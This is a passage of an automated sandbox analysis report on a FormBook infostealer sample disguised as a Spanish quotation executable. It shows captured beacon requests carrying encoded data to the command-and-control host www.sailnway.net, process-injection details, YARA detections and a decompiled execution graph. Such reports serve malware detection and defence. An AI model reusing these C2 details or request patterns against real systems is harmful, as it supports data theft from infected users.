              Origin: http://www.sailnway.net
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 202
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.sailnway.net/lrst/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 52 75 6b 69 33 74 64 73 37 58 65 4f 73 54 68 56 62 32 63 63 74 6c 62 55 46 31 56 42 66 66 4e 56 43 46 56 6d 50 70 79 65 35 33 42 4d 4b 66 33 4b 45 47 47 35 74 76 72 6b 6f 76 70 44 74 49 35 6e 6c 78 4b 51 70 4e 53 37 52 47 4c 77 4e 67 75 5a 50 38 39 6a 35 31 52 73 6a 65 72 66 51 51 49 42 33 67 56 63 66 44 62 31 33 63 4d 53 77 50 51 56 54 55 30 76 36 4a 35 2b 4a 31 78 69 5a 6f 39 65 4a 4e 64 50 2b 74 45 4c 51 69 44 4d 69 4d 48 71 31 43 50 57 70 57 42 2f 4b 31 62 70 45 66 76 2f 68 51 37 59 2f 4c 45 45 6d 61 48 6a 78 43 2f 77 4f 70 35 4c 4a 67 3d 3d
              Data Ascii: 0th4S=rBDGnmFpclO/Ruki3tds7XeOsThVb2cctlbUF1VBffNVCFVmPpye53BMKf3KEGG5tvrkovpDtI5nlxKQpNS7RGLwNguZP89j51RsjerfQQIB3gVcfDb13cMSwPQVTU0v6J5+J1xiZo9eJNdP+tELQiDMiMHq1CPWpWB/K1bpEfv/hQ7Y/LEEmaHjxC/wOp5LJg==


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              38192.168.2.114975685.159.66.93806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:59:06.819392920 CEST829OUTPOST /lrst/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.sailnway.net
              Origin: http://www.sailnway.net
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 222
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.sailnway.net/lrst/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 44 65 30 69 34 75 31 73 73 48 66 38 6a 7a 68 56 41 6d 63 51 74 6c 6e 55 46 77 35 52 65 74 35 56 43 6e 4e 6d 4f 6f 79 65 30 58 42 4d 41 2f 33 31 61 32 47 69 74 76 75 62 6f 75 56 44 74 49 39 6e 6c 78 61 51 6f 36 2b 30 51 57 4c 79 4c 67 75 66 4c 38 39 6a 35 31 52 73 6a 65 75 58 51 51 77 42 33 52 46 63 65 68 7a 71 35 38 4d 64 67 66 51 56 58 55 30 72 36 4a 35 51 4a 77 56 49 5a 72 46 65 4a 4d 74 50 2f 38 45 4d 48 53 44 4b 6d 4d 47 70 6b 42 32 68 6d 47 6f 51 4e 58 61 62 4c 4e 7a 74 74 32 71 43 76 6f 4e 54 6c 4a 50 68 6c 6b 65 41 48 59 63 43 53 70 57 64 61 4f 54 71 41 76 55 44 65 69 53 57 53 61 64 30 41 6f 30 3d
              Data Ascii: 0th4S=rBDGnmFpclO/De0i4u1ssHf8jzhVAmcQtlnUFw5Ret5VCnNmOoye0XBMA/31a2GitvubouVDtI9nlxaQo6+0QWLyLgufL89j51RsjeuXQQwB3RFcehzq58MdgfQVXU0r6J5QJwVIZrFeJMtP/8EMHSDKmMGpkB2hmGoQNXabLNztt2qCvoNTlJPhlkeAHYcCSpWdaOTqAvUDeiSWSad0Ao0=


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              39192.168.2.114975785.159.66.93806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:59:10.203685045 CEST1842OUTPOST /lrst/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.sailnway.net
              Origin: http://www.sailnway.net
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1234
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.sailnway.net/lrst/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 44 65 30 69 34 75 31 73 73 48 66 38 6a 7a 68 56 41 6d 63 51 74 6c 6e 55 46 77 35 52 65 74 42 56 43 30 46 6d 4f 4c 61 65 31 58 42 4d 65 76 33 30 61 32 47 76 74 72 44 53 6f 75 5a 54 74 4e 68 6e 6e 53 43 51 76 49 47 30 65 6d 4c 79 47 41 75 65 50 38 39 71 35 31 42 67 6a 65 65 58 51 51 77 42 33 53 74 63 62 44 62 71 70 4d 4d 53 77 50 51 5a 54 55 31 4f 36 4a 78 6d 4a 78 56 79 65 62 6c 65 51 73 39 50 79 75 38 4d 46 79 44 49 71 73 47 4c 6b 41 4b 2b 6d 47 6b 32 4e 57 66 4f 4c 50 7a 74 75 67 57 56 38 4a 4a 38 36 34 44 32 2f 6d 57 63 4c 6f 4d 54 65 75 61 6f 4b 65 36 59 62 5a 55 43 44 6e 6e 68 46 62 56 6f 43 74 75 4c 38 50 70 7a 39 36 55 73 6c 30 37 52 30 6b 74 59 69 6a 74 51 6e 69 66 43 4a 39 32 64 4d 4f 78 74 4d 48 58 6a 76 47 33 42 6e 75 67 72 78 30 31 2b 63 49 31 6e 42 47 71 6f 36 6e 35 42 53 69 53 6f 4f 48 56 70 39 6f 58 43 47 49 58 53 6b 4b 4b 38 76 4b 65 30 77 4c 2f 65 30 37 39 38 74 62 57 51 6e 63 55 49 46 44 4c 6f 51 45 53 74 74 51 36 4e 58 6b 4f 4f [TRUNCATED]
              Data Ascii: 0th4S=rBDGnmFpclO/De0i4u1ssHf8jzhVAmcQtlnUFw5RetBVC0FmOLae1XBMev30a2GvtrDSouZTtNhnnSCQvIG0emLyGAueP89q51BgjeeXQQwB3StcbDbqpMMSwPQZTU1O6JxmJxVyebleQs9Pyu8MFyDIqsGLkAK+mGk2NWfOLPztugWV8JJ864D2/mWcLoMTeuaoKe6YbZUCDnnhFbVoCtuL8Ppz96Usl07R0ktYijtQnifCJ92dMOxtMHXjvG3Bnugrx01+cI1nBGqo6n5BSiSoOHVp9oXCGIXSkKK8vKe0wL/e0798tbWQncUIFDLoQESttQ6NXkOOhblCOTEBJDrfGt9USgbp236L+cSYygbOjwSwpTIZS04g1jmUuIi/W/MimyJBx7l8s0CJ9JLwPAQMnwfDvMxbRAbIAXILGhF79Hd1YxcK8c7NISxf0252YcN0SOnfbN+j1kqujECuRQjMgKPVXH+lpWhhSrMk/opoSNxyTrOzkwEMOGSprFFtS8IGHZSxWkT2sBJUm57S3CYM0/swuzpJ/KWgut0bJNfAMETrPmJGWUDgvUt28cSqydscVQyRXD4NZ2x72ZkScL6jkzsY+wxQmIM3GsuiPFvPV5gDRPVObG3SXD0LSulI7WC8uDR6YHAF2m0yfgZTE5gaXi7KsAqCna/Zc2dlxm4nQtf1qyvqwZF1s7RYLMftfouvdB46f8zac+WWzu6EV2Gt9A/1VBqnp2b0svWzXNY/RzOgSrmMj7n/PaTczE3+m9RziFtfgijjFmpUmH7swg96H7wRy1bcyYKlYjtXASX9Mn9D+UJ0WwXIZC7ZuMpSY2FN1vdbCjgugLshL8cVMyyMlQ01T+U6KXx3PCc1p6ogoYNUgUs+AVnevs/jbqr30I7k9NU5J6UA6CzNx712Z11RLD2FRiJTFsPG70JPHX0uq8YIxNZUe6RRH/AWq7SromRfve4p44dxF2xVjbNPGhQWoe3YB5MJGa0V0QRssq53oh [TRUNCATED]


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              40192.168.2.114975885.159.66.93806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:59:12.751522064 CEST546OUTGET /lrst/?0th4S=mDrmkSN/AS2kB6l18epq8nmRkgENFEghmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KZmyEBjaCNdZ4vGhsxtLzd0F9+S16IRTv5qY=&u2pl=VvmP2xFp HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.sailnway.net
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:11:55:46
              Start date:22/09/2024
              Path:C:\Users\user\Desktop\Cotizaci#U00f3n.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\Cotizaci#U00f3n.exe"
              Imagebase:0x400000
              File size:1'364'003 bytes
              MD5 hash:6A246A44FB8910B98FAE3FC6ECDAA411
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              Target ID:2
              Start time:11:55:47
              Start date:22/09/2024
              Path:C:\Windows\SysWOW64\svchost.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\Cotizaci#U00f3n.exe"
              Imagebase:0xb30000
              File size:46'504 bytes
              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1505608975.0000000002B40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1505608975.0000000002B40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1506786583.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1506786583.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1505236600.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1505236600.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              Reputation:high
              Has exited:true

              Target ID:3
              Start time:11:55:59
              Start date:22/09/2024
              Path:C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe"
              Imagebase:0xdc0000
              File size:140'800 bytes
              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3764618447.0000000002A90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3764618447.0000000002A90000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
              Reputation:high
              Has exited:false

              Target ID:4
              Start time:11:56:01
              Start date:22/09/2024
              Path:C:\Windows\SysWOW64\netbtugc.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
              Imagebase:0x230000
              File size:22'016 bytes
              MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3764437768.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3764437768.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3756981302.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3756981302.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3764531026.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3764531026.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              Reputation:moderate
              Has exited:false

              Target ID:6
              Start time:11:56:13
              Start date:22/09/2024
              Path:C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe"
              Imagebase:0xdc0000
              File size:140'800 bytes
              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Target ID:8
              Start time:11:56:36
              Start date:22/09/2024
              Path:C:\Program Files\Mozilla Firefox\firefox.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
              Imagebase:0x7ff6de060000
              File size:676'768 bytes
              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Reset < >

                Execution Graph

                Execution Coverage:3.5%
                Dynamic/Decrypted Code Coverage:0.4%
                Signature Coverage:10.4%
                Total number of Nodes:2000
                Total number of Limit Nodes:35
                execution_graph 86167 4010e0 86170 401100 86167->86170 86169 4010f8 86171 401113 86170->86171 86172 401184 86171->86172 86173 40114c 86171->86173 86175 401120 86171->86175 86202 401182 86171->86202 86208 401250 61 API calls __recalloc 86172->86208 86176 401151 86173->86176 86177 40119d 86173->86177 86174 40112c DefWindowProcW 86174->86169 86175->86174 86215 401000 Shell_NotifyIconW __recalloc 86175->86215 86179 401219 86176->86179 86180 40115d 86176->86180 86182 4011a3 86177->86182 86183 42afb4 86177->86183 86179->86175 86186 401225 86179->86186 86184 401163 86180->86184 86185 42b01d 86180->86185 86181 401193 86181->86169 86182->86175 86192 4011b6 KillTimer 86182->86192 86193 4011db SetTimer RegisterWindowMessageW 86182->86193 86210 40f190 10 API calls 86183->86210 86189 42afe9 86184->86189 86190 40116c 86184->86190 86185->86174 86214 4370f4 52 API calls 86185->86214 86226 468b0e 74 API calls __recalloc 86186->86226 86212 40f190 10 API calls 86189->86212 86190->86175 86197 401174 86190->86197 86191 42b04f 86216 40e0c0 86191->86216 86209 401000 Shell_NotifyIconW __recalloc 86192->86209 86193->86181 86195 401204 CreatePopupMenu 86193->86195 86195->86169 86211 45fd57 65 API calls __recalloc 86197->86211 86201 4011c9 PostQuitMessage 86201->86169 86202->86174 86203 42afe4 86203->86181 86204 42b00e 86213 401a50 335 API calls 86204->86213 86207 42afdc 86207->86174 86207->86203 86208->86181 86209->86201 86210->86181 86211->86207 86212->86204 86213->86202 86214->86202 86215->86191 86217 40e0e7 __recalloc 86216->86217 86218 40e142 86217->86218 86220 42729f DestroyIcon 86217->86220 86219 40e184 86218->86219 86249 4341e6 63 API calls __wcsicoll 86218->86249 86222 40e1a0 Shell_NotifyIconW 86219->86222 86223 4272db Shell_NotifyIconW 86219->86223 86220->86218 86227 401b80 86222->86227 86225 40e1ba 86225->86202 86226->86203 86228 401b9c 86227->86228 86248 401c7e 86227->86248 86250 4013c0 86228->86250 86231 42722b LoadStringW 86234 427246 86231->86234 86232 401bb9 86255 402160 86232->86255 86269 40e0a0 52 API calls 86234->86269 86235 401bcd 86237 427258 86235->86237 86238 401bda 86235->86238 86270 40d200 52 API calls 2 library calls 86237->86270 86238->86234 86239 401be4 86238->86239 86268 40d200 52 API calls 2 library calls 86239->86268 86242 427267 86243 42727b 86242->86243 86245 401bf3 _wcscpy __recalloc _wcsncpy 86242->86245 86271 40d200 52 API calls 2 library calls 86243->86271 86247 401c62 Shell_NotifyIconW 86245->86247 86246 427289 86247->86248 86248->86225 86249->86219 86272 4115d7 86250->86272 86256 426daa 86255->86256 86257 40216b _wcslen 86255->86257 86310 40c600 86256->86310 86260 402180 86257->86260 86261 40219e 86257->86261 86259 426db5 86259->86235 86309 403bd0 52 API calls ctype 86260->86309 86262 4013a0 52 API calls 86261->86262 86264 4021a5 86262->86264 86266 426db7 86264->86266 86267 4115d7 52 API calls 86264->86267 86265 402187 _memmove 86265->86235 86267->86265 86268->86245 86269->86245 86270->86242 86271->86246 86274 4115e1 _malloc 86272->86274 86275 4013e4 86274->86275 86278 4115fd std::exception::exception 86274->86278 86286 4135bb 86274->86286 86283 4013a0 86275->86283 86276 41163b 86301 4180af 46 API calls std::exception::operator= 86276->86301 86278->86276 86300 41130a 51 API calls __cinit 86278->86300 86279 411645 86302 418105 RaiseException 86279->86302 86282 411656 86284 4115d7 52 API calls 86283->86284 86285 4013a7 86284->86285 86285->86231 86285->86232 86287 413638 _malloc 86286->86287 86292 4135c9 _malloc 86286->86292 86308 417f77 46 API calls __getptd_noexit 86287->86308 86290 4135f7 RtlAllocateHeap 86290->86292 86299 413630 86290->86299 86292->86290 86293 4135d4 86292->86293 86294 413624 86292->86294 86297 413622 86292->86297 86293->86292 86303 418901 46 API calls 2 library calls 86293->86303 86304 418752 46 API calls 8 library calls 86293->86304 86305 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86293->86305 86306 417f77 46 API calls __getptd_noexit 86294->86306 86307 417f77 46 API calls __getptd_noexit 86297->86307 86299->86274 86300->86276 86301->86279 86302->86282 86303->86293 86304->86293 86306->86297 86307->86299 86308->86299 86309->86265 86311 40c619 86310->86311 86312 40c60a 86310->86312 86311->86259 86312->86311 86315 4026f0 86312->86315 86314 426d7a _memmove 86314->86259 86316 426873 86315->86316 86317 4026ff 86315->86317 86318 4013a0 52 API calls 86316->86318 86317->86314 86319 42687b 86318->86319 86320 4115d7 52 API calls 86319->86320 86321 42689e _memmove 86320->86321 86321->86314 86322 40bd20 86323 428194 86322->86323 86324 40bd2d 86322->86324 86326 40bd43 86323->86326 86328 4281bc 86323->86328 86329 4281b2 86323->86329 86325 40bd37 86324->86325 86345 4531b1 85 API calls 5 library calls 86324->86345 86334 40bd50 86325->86334 86344 45e987 86 API calls ctype 86328->86344 86343 40b510 VariantClear 86329->86343 86333 4281ba 86335 426cf1 86334->86335 86336 40bd63 86334->86336 86355 44cde9 52 API calls _memmove 86335->86355 86346 40bd80 86336->86346 86339 40bd73 86339->86326 86340 426cfc 86356 40e0a0 52 API calls 86340->86356 86342 426d02 86343->86333 86344->86324 86345->86325 86347 40bd8e 86346->86347 86354 40bdb7 _memmove 86346->86354 86348 40bded 86347->86348 86349 40bdad 86347->86349 86347->86354 86350 4115d7 52 API calls 86348->86350 86357 402f00 86349->86357 86352 40bdf6 86350->86352 86353 4115d7 52 API calls 86352->86353 86352->86354 86353->86354 86354->86339 86355->86340 86356->86342 86358 402f0c 86357->86358 86359 402f10 86357->86359 86358->86354 86360 4115d7 52 API calls 86359->86360 86361 4268c3 86359->86361 86362 402f51 ctype _memmove 86360->86362 86362->86354 86363 425ba2 86368 40e360 86363->86368 86365 425bb4 86384 41130a 51 API calls __cinit 86365->86384 86367 425bbe 86369 4115d7 52 API calls 86368->86369 86370 40e3ec GetModuleFileNameW 86369->86370 86385 413a0e 86370->86385 86372 40e421 _wcsncat 86388 413a9e 86372->86388 86375 4115d7 52 API calls 86376 40e45e _wcscpy 86375->86376 86391 40bc70 86376->86391 86380 40e4a9 86380->86365 86381 4115d7 52 API calls 86382 40e4a1 _wcscat _wcslen _wcsncpy 86381->86382 86382->86380 86382->86381 86383 401c90 52 API calls 86382->86383 86383->86382 86384->86367 86410 413801 86385->86410 86440 419efd 86388->86440 86392 4115d7 52 API calls 86391->86392 86393 40bc98 86392->86393 86394 4115d7 52 API calls 86393->86394 86395 40bca6 86394->86395 86396 40e4c0 86395->86396 86452 403350 86396->86452 86398 40e4cb RegOpenKeyExW 86399 427190 RegQueryValueExW 86398->86399 86400 40e4eb 86398->86400 86401 4271b0 86399->86401 86402 42721a RegCloseKey 86399->86402 86400->86382 86403 4115d7 52 API calls 86401->86403 86402->86382 86404 4271cb 86403->86404 86459 43652f 52 API calls 86404->86459 86406 4271d8 RegQueryValueExW 86407 42720e 86406->86407 86408 4271f7 86406->86408 86407->86402 86409 402160 52 API calls 86408->86409 86409->86407 86411 41389e 86410->86411 86417 41381a 86410->86417 86412 4139e8 86411->86412 86414 413a00 86411->86414 86437 417f77 46 API calls __getptd_noexit 86412->86437 86439 417f77 46 API calls __getptd_noexit 86414->86439 86415 4139ed 86438 417f25 10 API calls __write_nolock 86415->86438 86417->86411 86425 41388a 86417->86425 86432 419e30 46 API calls 2 library calls 86417->86432 86420 41396c 86420->86411 86422 413967 86420->86422 86423 41397a 86420->86423 86421 413929 86421->86411 86424 413945 86421->86424 86434 419e30 46 API calls 2 library calls 86421->86434 86422->86372 86436 419e30 46 API calls 2 library calls 86423->86436 86424->86411 86424->86422 86428 41395b 86424->86428 86425->86411 86431 413909 86425->86431 86433 419e30 46 API calls 2 library calls 86425->86433 86435 419e30 46 API calls 2 library calls 86428->86435 86431->86420 86431->86421 86432->86425 86433->86431 86434->86424 86435->86422 86436->86422 86437->86415 86438->86422 86439->86422 86441 419f13 86440->86441 86442 419f0e 86440->86442 86449 417f77 46 API calls __getptd_noexit 86441->86449 86442->86441 86445 419f2b 86442->86445 86447 40e454 86445->86447 86451 417f77 46 API calls __getptd_noexit 86445->86451 86447->86375 86448 419f18 86450 417f25 10 API calls __write_nolock 86448->86450 86449->86448 86450->86447 86451->86448 86453 403367 86452->86453 86454 403358 86452->86454 86455 4115d7 52 API calls 86453->86455 86454->86398 86456 403370 86455->86456 86457 4115d7 52 API calls 86456->86457 86458 40339e 86457->86458 86458->86398 86459->86406 86460 416454 86497 416c70 86460->86497 86462 416460 GetStartupInfoW 86463 416474 86462->86463 86498 419d5a HeapCreate 86463->86498 86465 4164cd 86466 4164d8 86465->86466 86581 41642b 46 API calls 3 library calls 86465->86581 86499 417c20 GetModuleHandleW 86466->86499 86469 4164de 86470 4164e9 __RTC_Initialize 86469->86470 86582 41642b 46 API calls 3 library calls 86469->86582 86518 41aaa1 GetStartupInfoW 86470->86518 86474 416503 GetCommandLineW 86531 41f584 GetEnvironmentStringsW 86474->86531 86478 416513 86537 41f4d6 GetModuleFileNameW 86478->86537 86480 41651d 86483 416528 86480->86483 86584 411924 46 API calls 3 library calls 86480->86584 86541 41f2a4 86483->86541 86484 41652e 86485 416539 86484->86485 86585 411924 46 API calls 3 library calls 86484->86585 86555 411703 86485->86555 86488 416541 86490 41654c __wwincmdln 86488->86490 86586 411924 46 API calls 3 library calls 86488->86586 86559 40d6b0 86490->86559 86493 41657c 86588 411906 46 API calls _doexit 86493->86588 86496 416581 __freefls@4 86497->86462 86498->86465 86500 417c34 86499->86500 86501 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86499->86501 86589 4178ff 49 API calls _free 86500->86589 86503 417c87 TlsAlloc 86501->86503 86506 417cd5 TlsSetValue 86503->86506 86507 417d96 86503->86507 86504 417c39 86504->86469 86506->86507 86508 417ce6 __init_pointers 86506->86508 86507->86469 86590 418151 InitializeCriticalSectionAndSpinCount 86508->86590 86510 417d91 86598 4178ff 49 API calls _free 86510->86598 86512 417d2a 86512->86510 86591 416b49 86512->86591 86515 417d76 86597 41793c 46 API calls 4 library calls 86515->86597 86517 417d7e GetCurrentThreadId 86517->86507 86519 416b49 __calloc_crt 46 API calls 86518->86519 86526 41aabf 86519->86526 86520 4164f7 86520->86474 86583 411924 46 API calls 3 library calls 86520->86583 86521 41ac34 86522 41ac6a GetStdHandle 86521->86522 86524 41acce SetHandleCount 86521->86524 86525 41ac7c GetFileType 86521->86525 86530 41aca2 InitializeCriticalSectionAndSpinCount 86521->86530 86522->86521 86523 416b49 __calloc_crt 46 API calls 86523->86526 86524->86520 86525->86521 86526->86520 86526->86521 86526->86523 86527 41abb4 86526->86527 86527->86521 86528 41abe0 GetFileType 86527->86528 86529 41abeb InitializeCriticalSectionAndSpinCount 86527->86529 86528->86527 86528->86529 86529->86520 86529->86527 86530->86520 86530->86521 86532 41f595 86531->86532 86533 41f599 86531->86533 86532->86478 86533->86533 86608 416b04 86533->86608 86535 41f5bb _memmove 86536 41f5c2 FreeEnvironmentStringsW 86535->86536 86536->86478 86538 41f50b _wparse_cmdline 86537->86538 86539 416b04 __malloc_crt 46 API calls 86538->86539 86540 41f54e _wparse_cmdline 86538->86540 86539->86540 86540->86480 86542 41f2bc _wcslen 86541->86542 86544 41f2b4 86541->86544 86543 416b49 __calloc_crt 46 API calls 86542->86543 86548 41f2e0 _wcslen 86543->86548 86544->86484 86545 41f336 86615 413748 86545->86615 86547 416b49 __calloc_crt 46 API calls 86547->86548 86548->86544 86548->86545 86548->86547 86549 41f35c 86548->86549 86552 41f373 86548->86552 86614 41ef12 46 API calls 2 library calls 86548->86614 86551 413748 _free 46 API calls 86549->86551 86551->86544 86621 417ed3 86552->86621 86554 41f37f 86554->86484 86556 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86555->86556 86558 411750 __IsNonwritableInCurrentImage 86556->86558 86640 41130a 51 API calls __cinit 86556->86640 86558->86488 86560 42e2f3 86559->86560 86561 40d6cc 86559->86561 86641 408f40 86561->86641 86563 40d707 86645 40ebb0 86563->86645 86566 40d737 86648 411951 86566->86648 86571 40d751 86660 40f4e0 SystemParametersInfoW SystemParametersInfoW 86571->86660 86573 40d75f 86661 40d590 GetCurrentDirectoryW 86573->86661 86575 40d767 SystemParametersInfoW 86576 40d78d 86575->86576 86577 408f40 VariantClear 86576->86577 86578 40d79d 86577->86578 86579 408f40 VariantClear 86578->86579 86580 40d7a6 86579->86580 86580->86493 86587 4118da 46 API calls _doexit 86580->86587 86581->86466 86582->86470 86587->86493 86588->86496 86589->86504 86590->86512 86593 416b52 86591->86593 86594 416b8f 86593->86594 86595 416b70 Sleep 86593->86595 86599 41f677 86593->86599 86594->86510 86594->86515 86596 416b85 86595->86596 86596->86593 86596->86594 86597->86517 86598->86507 86600 41f683 86599->86600 86605 41f69e _malloc 86599->86605 86601 41f68f 86600->86601 86600->86605 86607 417f77 46 API calls __getptd_noexit 86601->86607 86603 41f6b1 HeapAlloc 86604 41f6d8 86603->86604 86603->86605 86604->86593 86605->86603 86605->86604 86606 41f694 86606->86593 86607->86606 86611 416b0d 86608->86611 86609 4135bb _malloc 45 API calls 86609->86611 86610 416b43 86610->86535 86611->86609 86611->86610 86612 416b24 Sleep 86611->86612 86613 416b39 86612->86613 86613->86610 86613->86611 86614->86548 86616 41377c __dosmaperr 86615->86616 86617 413753 RtlFreeHeap 86615->86617 86616->86544 86617->86616 86618 413768 86617->86618 86624 417f77 46 API calls __getptd_noexit 86618->86624 86620 41376e GetLastError 86620->86616 86625 417daa 86621->86625 86624->86620 86626 417dc9 __recalloc __call_reportfault 86625->86626 86627 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86626->86627 86630 417eb5 __call_reportfault 86627->86630 86629 417ed1 GetCurrentProcess TerminateProcess 86629->86554 86631 41a208 86630->86631 86632 41a210 86631->86632 86633 41a212 IsDebuggerPresent 86631->86633 86632->86629 86639 41fe19 86633->86639 86636 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86637 421ff0 __call_reportfault 86636->86637 86638 421ff8 GetCurrentProcess TerminateProcess 86636->86638 86637->86638 86638->86629 86639->86636 86640->86558 86642 408f48 ctype 86641->86642 86643 4265c7 VariantClear 86642->86643 86644 408f55 ctype 86642->86644 86643->86644 86644->86563 86701 40ebd0 86645->86701 86705 4182cb 86648->86705 86650 41195e 86712 4181f2 